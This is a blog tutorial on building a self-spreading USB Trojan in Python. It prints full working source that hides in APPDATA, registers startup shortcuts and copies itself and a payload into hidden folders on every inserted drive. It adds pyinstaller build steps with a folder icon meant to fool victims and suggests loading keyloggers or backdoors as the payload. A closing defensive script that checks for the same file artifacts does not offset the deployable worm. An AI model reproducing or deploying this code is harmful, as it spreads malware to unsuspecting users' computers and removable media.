USB Trojan Tutorial: How to Create, Deploy and Protect Against Malicious USB Attacks


Introduction

A computer Trojan is a type of malicious software that appears to be harmless but is actually designed to harm a computer system or steal data from it. It is one of the most common forms of malware that cybercriminals use to compromise computer security. A Trojan horse can be disguised as legitimate software or a legitimate file, such as a game, video or music file, and can be spread through various methods, including email attachments, malicious websites, and social engineering tactics. One particularly insidious form of Trojan horse is the USB Trojan, which is designed to infect computers through USB devices, such as thumb drives or external hard drives. In this blog post, we will explore the dangers of USB Trojans and how you can code one yourself for educational purposes.

This idea is inspired by this GitHub post.

Disclaimer

The consequences of spreading a USB Trojan can be devastating, and can result in legal action and severe penalties. It is important to take computer security seriously and avoid creating or distributing malware of any kind.

I am not supporting any crime in any way with this blog post; I am just writing it to demonstrate how easy it is to write Trojans like this one.
It is for informational purposes only, and reprogramming it is at your own risk.

How the USB Trojan works

  1. The Trojan gets installed on the victim's computer.
  2. When the PC restarts, the Cockroach runs in the background and looks for new USB drives.
  3. The spyware is activated after a reboot. From then on, every time a USB drive is inserted into the affected PC, the virus copies itself onto it and also creates a hidden folder called data with payload.exe in it.
  4. The payload.exe can be anything (keylogger, credentials grabber, backdoor, etc.).
  5. Now the cycle starts again.

If a USB drive is infected it will look like this. The actual payload is stored in the data folder. If someone opens ClickMe.exe, it copies itself and the payload into the APPDATA directory and adds both programs to the Startup folder.

How to code the USB Trojan

First we need to import some modules:

import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import os

Now we can create a method which checks for new USB Drives:

def get_removable_drives():
    drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
    rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
    return rdrives

After this we need to check whether the computer is already infected.

If a PC is already infected, it has the folder WindowsRuntime and the file win_log.txt in the APPDATA directory, so we have to check whether the directory and the file exist. But first we need to find out whether we are running our Cockroach from a USB drive or from the APPDATA directory after a PC startup.

For this we create the following function:

isOnUSB = False
def checkIfIsOnUSB():
    global isOnUSB
    executePath = sys.executable
    #executePath = "E:\Cockroach Python\dist\cockroach.exe"
    x = executePath.split("\\")
    currentDir = x[0]+"\\" 
    drives = get_removable_drives()
    for d in drives:
        if(d==currentDir):
             isOnUSB=True

Now we can check if the computer is already infected with our trojan:

#Define the names of the payload and trojan
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME

COCKROACHNAME = "ClickMe.exe"
def checkInfection():
    global PAYLOADNAME
    global COCKROACHNAME
    APPDATA = os.getenv('APPDATA') + "\\"
    if(isOnUSB):
        #Cockroach is on USB
        #Check if the file win_log exists in the APPDATA Folder
        filePath = APPDATA + "win_log.txt"
        if not os.path.isfile(filePath):
            #Infect the pc
            directory = APPDATA + "WindowsRuntime"
            #Create WindowsRuntime Folder
            if not os.path.exists(directory):
                os.makedirs(directory)
            #Paste directory of it into it
            #Paste payload and cockroach into it
            shutil.copy(PAYLOADSRC, directory)
            #Paste cockroach into it
            shutil.copy(COCKROACHNAME, directory)
            #Write to file for infection
            f = open(filePath, "w")
            f.write("g")
            f.close()
            #Add Payload to start and ClickMe also
            addToStartUp()
            sys.exit("")
    else:
        #Check for incoming usb sticks
        drives = get_removable_drives()
        while True:
            drives = get_removable_drives()
            for d in drives:
                if not os.path.exists(d+"\data"):
                    #infect machine
                    os.makedirs(d+"\data")
                    FILE_ATTRIBUTE_HIDDEN = 0x02
                    ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
                    #Copy payload into it
                    src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
                    shutil.copy(src, d+"\data")
                    src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
                    shutil.copy(src, d)
            time.sleep(10)

This function checks whether the program is running from a USB drive. If so, it checks whether the computer is already infected, and if not, it copies itself into the APPDATA directory and creates a new folder called WindowsRuntime there.

If the computer is already infected, it just closes itself.

If we are not running the program from a USB device, we know that the Trojan is already installed and that the program was launched at startup. Now we can check for new USB devices and infect them.

It waits 10 seconds after each pass of checking and infecting the USB devices.

That's all. Now we just have to put all these pieces of code together, and we have a running script which looks like this:

import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import os
isOnUSB = False
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME

COCKROACHNAME = "ClickMe.exe"
def checkInfection():
    global PAYLOADNAME
    global COCKROACHNAME
    APPDATA = os.getenv('APPDATA') + "\\"
    if(isOnUSB):
        #Cockroach is on USB
        filePath = APPDATA + "win_log.txt"
        if not os.path.isfile(filePath):
            #Infected the pc
            directory = APPDATA + "WindowsRuntime"
            #Create WindowsRuntime Folder
            if not os.path.exists(directory):
                os.makedirs(directory)
            #Paste directory of it into it
            #Paste payload and cockroach into it
            shutil.copy(PAYLOADSRC, directory)
            #Paste cockroach into it
            shutil.copy(COCKROACHNAME, directory)
            #Write to file for infection
            f = open(filePath, "w")
            f.write("g")
            f.close()
            #Add Payload to start and ClickMe also
            addToStartUp()
            sys.exit("")
    else:
        #Check for incoming usb sticks
        drives = get_removable_drives()
        while True:
            drives = get_removable_drives()
            for d in drives:
                if not os.path.exists(d+"\data"):
                    #infect machine
                    os.makedirs(d+"\data")
                    FILE_ATTRIBUTE_HIDDEN = 0x02
                    ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
                    #Copy payload into it
                    src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
                    shutil.copy(src, d+"\data")
                    src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
                    shutil.copy(src, d)
            time.sleep(3)


def addToStartUp():
    global PAYLOADNAME
    APPDATA = os.getenv('APPDATA')
    paySRC = APPDATA+"\\WindowsRuntime\\"+PAYLOADNAME
    roachSRC = APPDATA+"\\WindowsRuntime\\"+COCKROACHNAME
    startupSource = APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    #For Payload.exe
    path = os.path.join(startupSource, 'WindowsRuntimeException.lnk')
    target = paySRC
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(path)
    shortcut.Targetpath = target
    shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
    shortcut.save()
    #For ClickMe
    path = os.path.join(startupSource, 'WindowsRuntime.lnk')
    target = roachSRC
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(path)
    shortcut.Targetpath = target
    shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
    shortcut.save()


def get_removable_drives():
    drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
    rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
    return rdrives
def checkIfIsOnUSB():
    global isOnUSB
    executePath = sys.executable
    #executePath = "E:\Cockroach Python\dist\cockroach.exe"
    x = executePath.split("\\")
    currentDir = x[0]+"\\" 
    drives = get_removable_drives()
    for d in drives:
        if(d==currentDir):
             isOnUSB=True

if __name__ == "__main__":
    checkIfIsOnUSB()
    checkInfection()

Convert it to exe

In order to convert it into a runnable program, we install pyinstaller with the command:

pip install pyinstaller

Now we can run:

pyinstaller --onefile --noconsole --icon=icon.ico <name>.py

I wanted to add a folder icon to the exe so that our victim thinks it is a folder, so I downloaded a folder png like this and converted it into an ico file.

You will now find these two folders in your project, but the only important one is the dist folder. Now rename the .exe file to match the COCKROACHNAME variable in your Python file.

Injecting the payload

Now we need to add the actual payload to our Cockroach. For this we create a new folder called data in the dist folder. Now you can move your payload into the data folder (it has to have the same name as the PAYLOADNAME variable in Python).

Test it out

Now move the data folder and ClickMe.exe onto a USB drive and run the ClickMe.exe file. The PC is now infected and will copy the payload and our USB Cockroach to all incoming USB devices.

Conclusion

So what are we learning with this project?

USB sticks can be very dangerous and it is very easy to write Trojans like these, which most users do not even notice.
Therefore, always remember not to insert foreign USB sticks into your computer and especially not to open foreign files that you are unsure about.
Also, remember that your antivirus programs do not protect you from all programs like this one, and always be careful what you run on your PC.
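
Because antivirus may miss a program like this, a defender can look for the artifacts it leaves behind. The following check is an added example, not part of the original script; it searches a profile's APPDATA directory and a list of drive roots for the file names used in this post, and the helper `build_constructed_sample` only creates empty stand-in files for testing.

```python
import os
import sys
from pathlib import Path

# File names come from the script in this post; a renamed copy would evade this check.
STARTUP = "Microsoft/Windows/Start Menu/Programs/Startup"
HOST_ARTIFACTS = [
    "win_log.txt",                             # infection marker in %APPDATA%
    "WindowsRuntime/payload.exe",              # copied payload
    "WindowsRuntime/ClickMe.exe",              # copied dropper
    STARTUP + "/WindowsRuntimeException.lnk",  # startup shortcut to the payload
    STARTUP + "/WindowsRuntime.lnk",           # startup shortcut to the dropper
]
FILE_ATTRIBUTE_HIDDEN = 0x02  # attribute the script sets on the USB data folder


def is_hidden(path):
    """True if the Windows hidden bit is set; always False on other systems."""
    return bool(getattr(path.stat(), "st_file_attributes", 0) & FILE_ATTRIBUTE_HIDDEN)


def find_indicators(appdata, drive_roots):
    """Return (scope, relative_path, note) for each artifact that exists."""
    hits = [("host", rel, "") for rel in HOST_ARTIFACTS if (Path(appdata) / rel).exists()]
    for root in map(Path, drive_roots):
        if (root / "data" / "payload.exe").exists():
            note = "hidden folder" if is_hidden(root / "data") else "folder not hidden"
            hits.append(("drive", "data/payload.exe", note))
        if (root / "ClickMe.exe").exists():
            hits.append(("drive", "ClickMe.exe", ""))
    return hits


def build_constructed_sample(base):
    """Create empty stand-in files (constructed test data, not real binaries)."""
    appdata, drive = Path(base) / "appdata", Path(base) / "drive"
    for target in [appdata / rel for rel in HOST_ARTIFACTS] + [
        drive / "data" / "payload.exe", drive / "ClickMe.exe"
    ]:
        target.parent.mkdir(parents=True, exist_ok=True)
        target.touch()
    return appdata, drive


if __name__ == "__main__":
    # On Windows: pass removable drive roots as arguments, e.g. E:\
    for hit in find_indicators(os.environ.get("APPDATA", "."), sys.argv[1:]):
        print(hit)
```

Any hit on the host side means the Startup folder shortcuts and the WindowsRuntime directory should be removed together, since either shortcut relaunches the program at the next logon.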
